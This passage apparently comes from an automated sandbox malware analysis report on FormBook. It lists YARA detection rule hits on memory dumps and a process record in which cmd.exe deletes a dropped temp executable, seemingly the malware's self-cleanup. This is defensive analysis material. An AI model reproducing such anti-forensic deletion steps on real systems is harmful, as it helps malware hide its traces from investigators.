                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Target ID:9
                                        Start time:17:08:28
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
                                        Imagebase:0x49d30000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        No disassembly